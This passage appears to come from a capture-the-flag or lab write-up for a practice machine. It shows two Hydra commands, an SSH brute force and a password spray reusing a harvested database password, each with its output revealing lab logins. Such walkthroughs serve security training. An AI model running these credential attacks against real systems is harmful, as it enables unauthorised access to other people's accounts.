Brute Force Attack
Several credentials have been collected through the passwd file and DB credential
┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/funboxeasyenum]
└─$ hydra -L users.txt -e nsr ssh://$IP -t 64
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-05-01 00:28:15
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 18 tasks per 1 server, overall 18 tasks, 18 login tries (l:6/p:3), ~1 try per task
[DATA] attacking ssh://192.168.187.132:22/
[22][ssh] host: 192.168.187.132 login: goat password: goat
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-05-01 00:28:18The goat user’s password is goat
Moving on to the Lateral Movement phase
Password Spray
┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/funboxeasyenum]
└─$ hydra -L users.txt -p 'tgbzhnujm!' ssh://$IP -t 64
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-05-01 00:39:41
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 6 tasks per 1 server, overall 6 tasks, 6 login tries (l:6/p:1), ~1 try per task
[DATA] attacking ssh://192.168.187.132:22/
[22][ssh] host: 192.168.187.132 login: karla password: tgbzhnujm!
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-05-01 00:39:44The DB password, tgbzhnujm!, also belongs to the karla user
Moving on to the Lateral Movement phase